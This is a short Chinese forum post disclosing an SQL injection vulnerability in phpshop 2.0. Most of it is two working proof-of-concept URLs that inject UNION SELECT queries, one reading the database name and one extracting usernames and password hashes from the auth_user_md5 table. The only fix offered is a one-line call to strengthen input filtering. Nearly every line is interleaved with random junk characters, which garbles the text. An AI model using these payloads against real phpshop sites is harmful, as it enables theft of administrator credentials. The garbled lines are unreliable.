标题 : phpshop 2.0 SQL Injection Vulnerability
" F- v$ C3 E4 X0 o" w
+ w5 B' C( f9 r作者 : By onestree
: h& H+ D4 g" S2 L下载地址 : http://code.google.com/p/phpshop/downloads/list
0 T6 {# x! C+ B7 a" }, z5 i测试地址: windows 7 / ubuntu
1 S/ N6 r. T+ U8 ?( h+ {, m
/ O9 H( b# h3 x 9 H7 i! Z8 L" V
SQLi p0c:
; n/ d8 H7 k, s: d) j! J, a. i
) Y, Y$ }% v$ K% t( I==================
5 q6 @1 X6 h1 S7 f# S & p4 ]8 ?7 d5 F) A
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'9 C% Q/ H5 x& D' J* `
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 x/ e- b$ u7 @/ C# s9 e5 w
! `4 Q5 @* ~, T5 R: qhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
: C* u2 A% R' g$ x3 g6 n' ^8 R9 m7 a4 W1 t& I2 T& z
修复:: \% J% A& b* I* K. J
加强过滤
% O" A$ {6 e8 u/ z d4 J
I+ b, K8 T# e; x( X% V$ O3 p, [( D5 `: C. \; w
|
发表于 2013-1-18 18:24:10
收藏
支持
反对